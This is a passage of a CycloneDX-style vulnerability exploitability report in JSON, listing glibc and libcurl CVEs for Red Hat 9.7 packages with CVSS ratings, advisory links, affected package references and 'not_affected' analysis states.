        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-5435",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to enforce the caller-supplied buffer length, and can result in an out-of-bounds write when printing TSIG records.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5435"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5435"
        },
        {
          "url": "https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5435"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34033"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5435"
        }
      ],
      "published": "2026-04-28T13:19:22+00:00",
      "updated": "2026-05-05T17:38:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5450",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:H"
        }
      ],
      "cwes": [
        122,
        787
      ],
      "description": "Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5450"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5450"
        },
        {
          "url": "https://inbox.sourceware.org/libc-announce/b11f0003-6ec1-4bd6-b9de-9e38a4efeca3@redhat.com/T/#u"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5450"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5450#range-21286997"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=CVE-2026-5450"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5450"
        }
      ],
      "published": "2026-04-20T21:16:36+00:00",
      "updated": "2026-04-23T15:33:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5545",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "A flaw was found in libcurl. An application using libcurl that performs an authenticated HTTP(S) request after a Negotiate-authenticated one to the same host may incorrectly reuse the previous connection. This authentication bypass vulnerability allows the second request to be sent over a connection authenticated with different credentials, potentially leading to unauthorized access or information disclosure.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5545"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5545"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5545.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5545"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5545"
        }
      ],
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
